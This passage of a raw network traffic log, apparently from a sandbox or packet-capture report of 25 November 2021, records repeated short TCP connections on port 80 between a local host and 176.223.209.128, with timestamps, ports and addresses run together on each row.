                                              Nov 25, 2021 10:52:49.088455915 CET8050394176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.088676929 CET5039480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.122941971 CET8050394176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.138618946 CET8050394176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.138674974 CET8050394176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.138897896 CET5039480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.138952017 CET5039480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.173255920 CET8050394176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.519395113 CET5039580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.552845001 CET8050395176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.553143978 CET5039580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.554647923 CET5039580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.588001013 CET8050395176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.588211060 CET5039580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.621634007 CET8050395176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.638241053 CET8050395176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.638293028 CET8050395176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:49.638458014 CET5039580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.638509035 CET5039580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:49.671988010 CET8050395176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.064856052 CET5039680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.098429918 CET8050396176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.098612070 CET5039680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.100164890 CET5039680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.133472919 CET8050396176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.133907080 CET5039680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.167105913 CET8050396176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.190781116 CET8050396176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.190831900 CET8050396176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.191015005 CET5039680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.191076040 CET5039680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.224312067 CET8050396176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.584083080 CET5039780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.618165970 CET8050397176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.618419886 CET5039780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.619972944 CET5039780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.653948069 CET8050397176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.654148102 CET5039780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.688213110 CET8050397176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.709996939 CET8050397176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.710053921 CET8050397176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:50.710231066 CET5039780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.710283995 CET5039780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:50.744486094 CET8050397176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.078764915 CET5039880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.112219095 CET8050398176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.112468958 CET5039880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.114068985 CET5039880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.147639036 CET8050398176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.147906065 CET5039880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.181494951 CET8050398176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.201992035 CET8050398176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.202048063 CET8050398176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.202193975 CET5039880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.202250957 CET5039880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.235765934 CET8050398176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.590883970 CET5039980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.624258995 CET8050399176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.624531984 CET5039980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.626205921 CET5039980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.659363031 CET8050399176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.659531116 CET5039980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.693062067 CET8050399176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.708842039 CET8050399176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.708905935 CET8050399176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:51.709213972 CET5039980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.709311962 CET5039980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:51.742880106 CET8050399176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.036504030 CET5040080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.070333958 CET8050400176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.070473909 CET5040080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.072016001 CET5040080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.105906963 CET8050400176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.106101990 CET5040080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.140026093 CET8050400176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.156078100 CET8050400176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.156100035 CET8050400176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.156251907 CET5040080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.156272888 CET5040080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.190165043 CET8050400176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.530270100 CET5040180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.563417912 CET8050401176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.563657999 CET5040180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.565167904 CET5040180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.598375082 CET8050401176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.598584890 CET5040180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.631958961 CET8050401176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.649394035 CET8050401176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.649444103 CET8050401176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.649611950 CET5040180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.649665117 CET5040180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:52.683186054 CET8050401176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:52.988118887 CET5040280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.022177935 CET8050402176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.022649050 CET5040280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.024229050 CET5040280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.058211088 CET8050402176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.058341026 CET5040280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.092375040 CET8050402176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.112158060 CET8050402176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.112236023 CET8050402176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.112433910 CET5040280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.112493992 CET5040280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.146454096 CET8050402176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.431493998 CET5040380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.465584993 CET8050403176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.465795040 CET5040380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.467348099 CET5040380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.501369953 CET8050403176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.501653910 CET5040380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.535831928 CET8050403176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.551305056 CET8050403176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.551357985 CET8050403176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.551527977 CET5040380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.551579952 CET5040380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.585761070 CET8050403176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.938786983 CET5040480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.972312927 CET8050404176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:53.972585917 CET5040480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:53.974143028 CET5040480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.007487059 CET8050404176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.007693052 CET5040480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.041208982 CET8050404176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.057122946 CET8050404176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.057174921 CET8050404176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.057344913 CET5040480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.057398081 CET5040480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.090959072 CET8050404176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.451498985 CET5040580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.485542059 CET8050405176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.485889912 CET5040580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.487405062 CET5040580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.521383047 CET8050405176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.521599054 CET5040580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.555613041 CET8050405176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.571399927 CET8050405176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.571448088 CET8050405176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.571620941 CET5040580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.571670055 CET5040580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.605906963 CET8050405176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.947432995 CET5040680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.980900049 CET8050406176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:54.981132984 CET5040680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:54.982707977 CET5040680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.016052961 CET8050406176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.016263962 CET5040680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.049665928 CET8050406176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.065568924 CET8050406176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.065618992 CET8050406176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.065788984 CET5040680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.065840006 CET5040680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.099423885 CET8050406176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.530925989 CET5040780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.563935995 CET8050407176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.564208031 CET5040780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.566183090 CET5040780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.599220991 CET8050407176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.599354029 CET5040780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.632396936 CET8050407176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.648091078 CET8050407176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.648101091 CET8050407176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:55.648585081 CET5040780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.648595095 CET5040780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:55.681627989 CET8050407176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.012399912 CET5040880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.045630932 CET8050408176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.045759916 CET5040880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.047377110 CET5040880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.080426931 CET8050408176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.080729008 CET5040880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.113970995 CET8050408176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.129972935 CET8050408176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.130022049 CET8050408176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.130243063 CET5040880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.130291939 CET5040880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.163697004 CET8050408176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.490322113 CET5040980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.524472952 CET8050409176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.524739027 CET5040980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.526257038 CET5040980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.560524940 CET8050409176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.560775042 CET5040980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.594820976 CET8050409176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.611107111 CET8050409176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.611155033 CET8050409176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.611413002 CET5040980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.611463070 CET5040980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:56.645464897 CET8050409176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:56.988723040 CET5041080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.022859097 CET8050410176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.023086071 CET5041080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.024559021 CET5041080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.058561087 CET8050410176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.058769941 CET5041080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.092855930 CET8050410176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.109306097 CET8050410176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.109358072 CET8050410176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.109508038 CET5041080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.109565973 CET5041080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.143676996 CET8050410176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.494618893 CET5041180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.528100014 CET8050411176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.528317928 CET5041180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.529844999 CET5041180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.563234091 CET8050411176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.563415051 CET5041180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.596879959 CET8050411176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.614809036 CET8050411176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.614859104 CET8050411176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.615089893 CET5041180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.615140915 CET5041180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:57.648798943 CET8050411176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:57.995392084 CET5041280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.029473066 CET8050412176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.029710054 CET5041280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.031682968 CET5041280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.065706968 CET8050412176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.065882921 CET5041280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.099942923 CET8050412176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.180129051 CET8050412176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.180201054 CET8050412176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.180506945 CET5041280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.180608034 CET5041280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.214843988 CET8050412176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.574013948 CET5041380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.608191967 CET8050413176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.608423948 CET5041380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.610007048 CET5041380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.644016981 CET8050413176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.644468069 CET5041380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.678565979 CET8050413176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.700189114 CET8050413176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.700237989 CET8050413176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:58.700459003 CET5041380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.700517893 CET5041380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:58.734596014 CET8050413176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.034360886 CET5041480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.067708015 CET8050414176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.067905903 CET5041480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.074620962 CET5041480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.108026028 CET8050414176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.108258009 CET5041480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.141583920 CET8050414176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.157382965 CET8050414176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.157430887 CET8050414176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.157588005 CET5041480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.157653093 CET5041480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.190958023 CET8050414176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.532279015 CET5041580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.566169024 CET8050415176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.566399097 CET5041580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.567878962 CET5041580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.601921082 CET8050415176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.602237940 CET5041580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.636360884 CET8050415176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.651905060 CET8050415176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.651962042 CET8050415176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:59.652107954 CET5041580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.652168989 CET5041580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:59.686288118 CET8050415176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.051114082 CET5041680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.084851027 CET8050416176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.085134029 CET5041680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.086672068 CET5041680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.120094061 CET8050416176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.120341063 CET5041680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.153820992 CET8050416176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.169751883 CET8050416176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.169816971 CET8050416176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.169958115 CET5041680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.170022011 CET5041680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.203434944 CET8050416176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.575130939 CET5041780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.609060049 CET8050417176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.609443903 CET5041780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.611074924 CET5041780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.644788980 CET8050417176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.645057917 CET5041780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.679038048 CET8050417176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.696907043 CET8050417176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.696959019 CET8050417176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:00.697213888 CET5041780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.697266102 CET5041780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:00.731457949 CET8050417176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.095597029 CET5041880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.129051924 CET8050418176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.129327059 CET5041880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.130911112 CET5041880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.164274931 CET8050418176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.164452076 CET5041880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.197735071 CET8050418176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.218281984 CET8050418176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.218328953 CET8050418176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.218466043 CET5041880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.218525887 CET5041880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.251950026 CET8050418176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.542732000 CET5041980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.576545000 CET8050419176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.576723099 CET5041980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.578295946 CET5041980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.611994028 CET8050419176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.612272978 CET5041980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.646097898 CET8050419176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.661658049 CET8050419176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.661746979 CET8050419176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:01.661904097 CET5041980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.661946058 CET5041980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:01.695899010 CET8050419176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.024971008 CET5042080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.059035063 CET8050420176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.059273005 CET5042080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.060782909 CET5042080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.094836950 CET8050420176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.095108986 CET5042080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.129300117 CET8050420176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.145915031 CET8050420176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.145970106 CET8050420176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.146150112 CET5042080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.146233082 CET5042080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.180568933 CET8050420176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.503021002 CET5042180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.536252975 CET8050421176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.536426067 CET5042180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.537939072 CET5042180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.571127892 CET8050421176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.571285963 CET5042180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.604537010 CET8050421176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.620155096 CET8050421176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.620177031 CET8050421176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.620415926 CET5042180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.620435953 CET5042180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:02.653711081 CET8050421176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:02.974076986 CET5042280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.007601023 CET8050422176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.007836103 CET5042280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.009357929 CET5042280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.042624950 CET8050422176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.042840004 CET5042280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.076293945 CET8050422176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.101900101 CET8050422176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.101955891 CET8050422176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.102257013 CET5042280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.102338076 CET5042280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.136010885 CET8050422176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.515077114 CET5042380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.548496962 CET8050423176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:03.548719883 CET5042380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:03.550199986 CET5042380192.168.11.20176.223.209.128
